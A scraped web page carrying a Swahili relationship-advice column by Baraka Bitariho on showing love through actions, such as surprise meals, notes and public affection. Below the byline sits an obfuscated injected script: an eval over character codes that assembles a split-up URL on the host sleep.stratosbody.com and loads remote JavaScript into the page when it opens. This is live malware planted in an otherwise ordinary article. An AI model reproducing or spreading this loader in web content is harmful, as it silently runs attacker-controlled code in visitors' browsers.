Recent Comments

DIMBWI LA MAHABA: Namna ya kuonesha upendo kwa vitendo

By Baraka Bitariho Sep 5, 2015
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

halima-mpya_210_120

KILA mtu aliye katika uhusiano wa mapenzi ambao unaonesha matumaini ya kudumu hutamani nafasi hiyo isipotee hivyo hujitahidi kwa kila hali kuhakikisha kuwa uhusiano huo unadumu.

Ili uhusiano huo udumu lazima yawepo mazingira mazuri, ikiwa ni pamoja na maelewano kati ya wenza, lakini sasa tatizo linakuja katika kutengeneza mazingira hayo. Kwa mujibu wa wachambuzi wa masuala ya mapenzi moja ya njia ya kupalilia uhusiano wa mapenzi ni kwa wenza kuonesha na kuambiana mara kwa mara kuwa wanapendana.

Lakini pia sote tunajua kumwambia mwenzako kila saa tu kuwa unampenda inaweza kumchosha na hivyo basi unahitajika ubunifu wa hali ya juu kama vile kumuonesha upendo wako kwa vitendo.

Hata hivyo, mara nyingi mtu unajisikia kumwambia mwenza wake anampenda hasa mwanaume, lakini inakuwia vigumu kutamka maneno, pamoja na hiyo kumbukeni kuwa matendo huzungumza zaidi kuliko maneno.

Jambo la kufanya hasa kwa wanaume ni kuonesha wazi kwa watu hisia zako juu ya mwenza wako, ikiwa ni pamoja na kumkumbatia au kumshika mkono mnapotembea. Mapenzi ya vificho siku zote huleta tahadhari kubwa kwa wanawake kwa kuwa ni ishara tosha kuwa mwanaume huyo au mwanamke hana hisia thabiti na mwenza wake ndio maana hapendi uhusiano ujulikane.

Fanya vimambo vidogo vidogo vya kumshangaza lakini pia kumfurahisha mwenza wako kama vile kumuandalia chakula kizuri na kumwekea vitu kama kadi au michoro inayoonesha hisia zako juu ya mwenza wako.

Mwanasaikolojia na mwandishi wa kitabu cha uhusiano cha Marriage Magic anasema mara zote vijimambo vidogo katika mapenzi husaidia sana kama vile kuogeshana au kumfanyia yale mambo anayoyapenda iwe chakula, mahali, muziki hata marafiki.

Jambo lingine muoneshe mwenza wako upendo kwa kumtetea katika mambo yoyote mbele za watu hata kama mtagombana kuhusu suala hilo lakini muwe wenyewe machoni pa watu iwe vingine.

Pia unaweza ukawa unaandika ujumbe mfupi ama wa simu ama kwenye karatasi na kumuachia ambao utakuwa na utani lakini pia ndani yake unaonesha upendo wako. Ficha ujumbe huo sehemu mbalimbali ambazo si matarajio yake kukuta kitu kama hicho kama vile kwenye gari, mfukoni mwake ama suruali au shati au hata chini ya mto.

Unaweza kumnunulia mwenza wako kadi au kumuandikia barua na jambo zuri zaidi unaweza kusambaza vikaratasi nyumba nzima vinavyoelezea kwanini unampenda. Tukija katika suala la chakula, hata wahenga wetu wamekuwa wakisema moyo wa mwanamume ni kupitia tumbo lake japokuwa suala hilo linaweza kuwa kweli hata kwa wanawake.

Onesha upendo kwa mwenza wako kwa kumpikia chakula cha jioni cha kumshangaza na kutengeneza na kuyapamba mazingira ya mlo huo vizuri kwa muziki, mishumaa na maua.

Halikadhalika mnaweza kusaidiana kupika chakula kwa pamoja au pangeni utaratibu wa kutoka na kwenda kula nje kwenye mgahawa unaotengeneza chakula kizuri na wenye mazingira ya utulivu, mgahawa ambao nyote hamjawahi kufika.

Kumbukeni kuthaminiana kwa vile maisha ni mafupi, na ukweli ni kwamba uhusiano ni kazi inayoendelea, hivyo kuweni wavumilivu na msidharauliane. Hakuna anayejua Mungu kapanga nini kesho hivyo fanyeni mambo yenu kwa sababu na siku zote mtaona faida yake.

Kwa maoni, ushauri na mapendekezo wasiliana nasi kupitia dimbwimahaba@dailynews-tsn. com au dimbwimahaba@yahoo. com A

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com